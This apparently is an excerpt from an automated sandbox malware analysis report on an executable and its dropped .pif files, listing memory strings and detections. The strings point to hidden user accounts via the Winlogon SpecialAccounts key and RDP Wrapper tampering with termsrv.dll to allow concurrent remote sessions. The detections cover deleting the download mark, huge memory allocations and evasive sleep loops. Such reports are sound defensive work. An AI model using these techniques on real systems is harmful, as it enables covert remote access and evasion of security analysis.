Source: qqig1mHX8U.exe, 00000000.00000002.2441581581.0000000021EDF000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilege%SystemRoot%\System32\termsrv.dllSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDll127.0.0.1SYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType]+@
Source: qqig1mHX8U.exe, 00000000.00000002.2441581581.0000000021F6A000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: qqig1mHX8U.exe, 00000000.00000002.2441581581.0000000021F6A000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilege%SystemRoot%\System32\termsrv.dllSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDll127.0.0.1SYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType]+@
Source: kwtqutrL.pif String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: kwtqutrL.pif, 0000000A.00000003.2424443585.0000000021165000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: kwtqutrL.pif, 0000000A.00000003.2424443585.0000000021165000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilege%SystemRoot%\System32\termsrv.dllSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDll127.0.0.1SYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType]+@
Source: kwtqutrL.pif, 0000000A.00000003.2424018007.0000000021165000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: kwtqutrL.pif, 0000000A.00000003.2424018007.0000000021165000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilege%SystemRoot%\System32\termsrv.dllSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDll127.0.0.1SYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType]+@
Source: kwtqutrL.pif, 0000000A.00000003.2423107004.0000000021155000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: kwtqutrL.pif, 0000000A.00000003.2423107004.0000000021155000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilege%SystemRoot%\System32\termsrv.dllSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDll127.0.0.1SYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType]+@
Source: kwtqutrL.pif, 0000000A.00000003.2424419773.0000000021151000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: kwtqutrL.pif, 0000000A.00000003.2424419773.0000000021151000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilege%SystemRoot%\System32\termsrv.dllSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDll127.0.0.1SYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType]+@
Source: kwtqutrL.pif, 0000000A.00000003.2424461904.0000000021167000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: kwtqutrL.pif, 0000000A.00000003.2424461904.0000000021167000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilege%SystemRoot%\System32\termsrv.dllSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDll127.0.0.1SYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType]+@
Source: kwtqutrL.pif, 0000000A.00000001.2400116274.000000000041A000.00000040.00000001.00020000.00000000.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: kwtqutrL.pif, 0000000A.00000001.2400116274.000000000041A000.00000040.00000001.00020000.00000000.sdmp String found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilege%SystemRoot%\System32\termsrv.dllSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDll127.0.0.1SYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType]+@
Source: kwtqutrL.pif, 0000000A.00000002.3547503805.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: kwtqutrL.pif, 0000000A.00000002.3547503805.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilege%SystemRoot%\System32\termsrv.dllSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDll127.0.0.1SYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType]+@
Source: Lrtuqtwk.PIF, 00000013.00000002.2572232052.0000000020C20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: Lrtuqtwk.PIF, 00000013.00000002.2572232052.0000000020C20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilege%SystemRoot%\System32\termsrv.dllSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDll127.0.0.1SYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType]+@
Source: kwtqutrL.pif String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: kwtqutrL.pif, 00000015.00000001.2536364319.000000000041A000.00000040.00000001.00020000.00000000.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: kwtqutrL.pif, 00000015.00000001.2536364319.000000000041A000.00000040.00000001.00020000.00000000.sdmp String found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilege%SystemRoot%\System32\termsrv.dllSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDll127.0.0.1SYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType]+@
Source: kwtqutrL.pif, 00000015.00000002.2575772053.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: kwtqutrL.pif, 00000015.00000002.2575772053.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilege%SystemRoot%\System32\termsrv.dllSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDll127.0.0.1SYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType]+@
Source: kwtqutrL.pif, 00000017.00000001.2613500142.0000000000400000.00000040.00000001.00020000.00000000.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: kwtqutrL.pif, 00000017.00000001.2613500142.0000000000400000.00000040.00000001.00020000.00000000.sdmp String found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilege%SystemRoot%\System32\termsrv.dllSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDll127.0.0.1SYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType]+@
Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Users\Public\Libraries\kwtqutrL.pif File opened: C:\Users\Public\Libraries\kwtqutrL.pif:Zone.Identifier read attributes | delete Jump to behavior
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Code function: 0_2_02F2AB1C GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_02F2AB1C
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Lrtuqtwk.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Lrtuqtwk.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Allocates many large memory junks
Source: C:\Users\Public\Libraries\Lrtuqtwk.PIF Memory allocated: 2EA0000 memory commit 500006912
Source: C:\Users\Public\Libraries\Lrtuqtwk.PIF Memory allocated: 2EA1000 memory commit 500178944
Source: C:\Users\Public\Libraries\Lrtuqtwk.PIF Memory allocated: 2ECD000 memory commit 500002816
Source: C:\Users\Public\Libraries\Lrtuqtwk.PIF Memory allocated: 2ECE000 memory commit 500350976
Source: C:\Users\Public\Libraries\Lrtuqtwk.PIF Memory allocated: 2F24000 memory commit 501014528
Source: C:\Users\Public\Libraries\Lrtuqtwk.PIF Memory allocated: 301C000 memory commit 500006912
Source: C:\Users\Public\Libraries\Lrtuqtwk.PIF Memory allocated: 301E000 memory commit 500015104
Source: C:\Users\Public\Libraries\Lrtuqtwk.PIF Memory allocated: 2DC0000 memory commit 500006912 Jump to behavior
Source: C:\Users\Public\Libraries\Lrtuqtwk.PIF Memory allocated: 2DC1000 memory commit 500178944 Jump to behavior
Source: C:\Users\Public\Libraries\Lrtuqtwk.PIF Memory allocated: 2DED000 memory commit 500002816 Jump to behavior
Source: C:\Users\Public\Libraries\Lrtuqtwk.PIF Memory allocated: 2DEE000 memory commit 500350976 Jump to behavior
Source: C:\Users\Public\Libraries\Lrtuqtwk.PIF Memory allocated: 2E44000 memory commit 501014528 Jump to behavior
Source: C:\Users\Public\Libraries\Lrtuqtwk.PIF Memory allocated: 2F3C000 memory commit 500006912 Jump to behavior
Source: C:\Users\Public\Libraries\Lrtuqtwk.PIF Memory allocated: 2F3E000 memory commit 500015104 Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Memory allocated: 2F10000 memory commit 500006912 Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Memory allocated: 2F11000 memory commit 500178944 Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Memory allocated: 2F3D000 memory commit 500002816 Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Memory allocated: 2F3E000 memory commit 500350976 Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Memory allocated: 2F94000 memory commit 501014528 Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Memory allocated: 308C000 memory commit 500006912 Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Memory allocated: 308E000 memory commit 500015104 Jump to behavior
Found evasive API chain (may stop execution after checking mutex)
Source: C:\Users\Public\Libraries\kwtqutrL.pif Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess
Contains functionality to enumerate running services
Source: C:\Users\Public\Libraries\kwtqutrL.pif Code function: OpenSCManagerW,EnumServicesStatusExW,EnumServicesStatusExW,GetLastError,CloseServiceHandle,OpenSCManagerW,lstrcmpW, 10_2_004114F4
Source: C:\Users\Public\Libraries\kwtqutrL.pif Code function: OpenSCManagerW,EnumServicesStatusExW,EnumServicesStatusExW,GetLastError,CloseServiceHandle,OpenSCManagerW,lstrcmpW, 21_2_004114F4
Found decision node followed by non-executed suspicious APIs
Source: C:\Users\Public\Libraries\kwtqutrL.pif Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
Found large amount of non-executed APIs
Source: C:\Users\Public\alpha.pif API coverage: 6.2 %
Source: C:\Users\Public\alpha.pif API coverage: 7.8 %
Source: C:\Users\Public\Libraries\Lrtuqtwk.PIF API coverage: 9.5 %
Source: C:\Users\Public\Libraries\kwtqutrL.pif API coverage: 5.1 %
Source: C:\Users\Public\Libraries\Lrtuqtwk.PIF API coverage: 9.5 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\Public\Libraries\kwtqutrL.pif TID: 7056 Thread sleep count: 60 > 30 Jump to behavior
Source: C:\Users\Public\Libraries\kwtqutrL.pif TID: 7056 Thread sleep time: -70000s >= -30000s Jump to behavior
Source: C:\Users\Public\Libraries\kwtqutrL.pif TID: 3168 Thread sleep count: 60 > 30
Source: C:\Users\Public\Libraries\kwtqutrL.pif TID: 7012 Thread sleep count: 60 > 30
